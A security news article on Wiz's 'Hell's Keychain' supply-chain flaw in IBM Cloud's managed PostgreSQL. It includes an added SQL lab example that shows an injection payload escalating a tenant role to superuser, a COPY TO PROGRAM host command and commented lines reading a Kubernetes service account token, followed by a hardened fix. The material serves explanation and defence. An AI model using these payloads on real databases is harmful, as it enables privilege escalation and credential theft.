IBM Cloud Supply Chain Vulnerability Demonstrates New Threat Class
Wiz security researchers discovered Hell’s Keychain, a first-of-its-kind cloud service provider supply-chain vulnerability, in IBM Cloud Databases for PostgreSQL.
The finding came out of a routine audit of IBM Cloud's PostgreSQL-as-a-service, in which the researchers set out to determine whether a customer could escalate to superuser, execute arbitrary code on the underlying virtual machine, and keep pushing against internal security boundaries from there.
The vulnerability chain hinged on three exposed secrets: a Kubernetes service account token, a private container registry password, and CI/CD server credentials. Combined with overly permissive network access to internal build servers, these would have let an attacker reach internal IBM Cloud services and tamper with the hosted system's internal image-building process, in other words mount a supply chain attack on cloud customers.
Wiz frames the problem as two separate conditions. The "forbidden link" is network access that connects a production environment to its build environment. The "keychain" is the collection of one or more scattered secrets an attacker discovers throughout the target environment. Each is poor hygiene but not dangerous on its own; together, according to the researchers, they form a deadly combination.
Hell's Keychain starts with a SQL injection flaw in ICD that grants the attacker superuser (the "ibm" role) privileges, which are then used to execute arbitrary commands on the virtual machine hosting the database instance.
That command execution is used to read a Kubernetes API token file, which opens up broader post-exploitation: pulling container images from IBM's private container registry, which stores the images related to ICD for PostgreSQL, and scanning those images for additional secrets.
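To make the first two links of the chain concrete, here is an added example of the class of bug described above, written for this page and not taken from IBM's service or Wiz's write-up. Managed PostgreSQL offerings commonly ship SECURITY DEFINER helper functions so that customers can trigger superuser-only actions; if such a helper builds its SQL by string concatenation, any caller can inject a second statement that runs as the function's owner. The schema, function and role names (admin_tools, create_ext, customer) are hypothetical, and the service account token path is the default in-pod location, which is an assumption. Run it as a superuser on a scratch PostgreSQL instance.

```sql
-- Added illustration, not IBM's code. Names are hypothetical.
CREATE ROLE customer LOGIN;            -- a low-privileged tenant role
CREATE SCHEMA IF NOT EXISTS admin_tools;

-- 1. Vulnerable helper: SECURITY DEFINER runs with the privileges of its
--    owner (the superuser that creates it), and ext_name is pasted into the
--    command text unescaped.
CREATE OR REPLACE FUNCTION admin_tools.create_ext_vulnerable(ext_name text)
RETURNS void
LANGUAGE plpgsql
SECURITY DEFINER
AS $$
BEGIN
    EXECUTE 'CREATE EXTENSION IF NOT EXISTS ' || ext_name;
END;
$$;
GRANT EXECUTE ON FUNCTION admin_tools.create_ext_vulnerable(text) TO PUBLIC;

-- 2. As the tenant: close the intended statement and append one that only a
--    superuser may run. PL/pgSQL EXECUTE hands the whole string to SPI, which
--    executes both statements as the function owner.
SET ROLE customer;
SELECT admin_tools.create_ext_vulnerable(
    'plpgsql; ALTER ROLE customer WITH SUPERUSER; --');
RESET ROLE;
SELECT rolname, rolsuper FROM pg_roles WHERE rolname = 'customer';  -- rolsuper = t

-- 3. Superuser -> commands on the host: COPY ... TO/FROM PROGRAM is the
--    standard PostgreSQL route and is superuser-only by default. In a new
--    session as the now-superuser "customer":
COPY (SELECT 1) TO PROGRAM 'id > /tmp/who_am_i.txt';
-- Reading an in-pod Kubernetes service account token is the same primitive
-- (path is the default location; assumed, not taken from the page):
-- CREATE TEMP TABLE loot (line text);
-- COPY loot FROM '/var/run/secrets/kubernetes.io/serviceaccount/token';
-- SELECT * FROM loot;

-- 4. Hardened helper: allowlist the input, quote it as an identifier with
--    format('%I'), pin search_path (PostgreSQL docs' advice for SECURITY
--    DEFINER), and do not expose the function to PUBLIC.
CREATE OR REPLACE FUNCTION admin_tools.create_ext(ext_name text)
RETURNS void
LANGUAGE plpgsql
SECURITY DEFINER
SET search_path = pg_catalog, pg_temp
AS $$
BEGIN
    IF ext_name NOT IN ('pgcrypto', 'hstore', 'pg_stat_statements') THEN
        RAISE EXCEPTION 'extension % is not permitted', ext_name;
    END IF;
    -- %I renders the value as a single quoted identifier, so a payload like
    -- 'plpgsql; ALTER ROLE ...' can never become a second statement.
    EXECUTE format('CREATE EXTENSION IF NOT EXISTS %I', ext_name);
END;
$$;
REVOKE EXECUTE ON FUNCTION admin_tools.create_ext(text) FROM PUBLIC;
GRANT EXECUTE ON FUNCTION admin_tools.create_ext(text) TO customer;

-- The same payload now fails on the allowlist check:
-- SELECT admin_tools.create_ext('plpgsql; ALTER ROLE customer WITH SUPERUSER; --');
-- ERROR:  extension plpgsql; ALTER ROLE customer WITH SUPERUSER; -- is not permitted
```

The check a reviewer wants on any managed-database image is `SELECT proname, proowner::regrole FROM pg_proc WHERE prosecdef;` to list every SECURITY DEFINER function, then read each one for `||` concatenation into EXECUTE. Even with correct quoting, a helper owned by the superuser should do the narrowest possible thing: the blast radius of the injection above was not the CREATE EXTENSION call but the superuser context it ran in.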
“Modifications to the PostgreSQL engine effectively introduced new vulnerabilities to the service,” the researchers wrote. “These vulnerabilities could have been exploited by a malicious actor as part of an extensive exploit chain culminating in a supply-chain attack on the platform.”
Wiz went on to say that it could extract internal artifact repository and FTP credentials from image manifest files, effectively giving it unrestricted read-write access to trusted repositories and IBM build servers.
IBM stated that the bug could have affected its Cloud Databases for PostgreSQL instances but that it found no evidence of malicious activity exploiting the PostgreSQL privilege escalation via SQL injection, and it has since patched the vulnerability for all of its customers. No customer action is required.
The source for this piece is an article in TheHackerNews.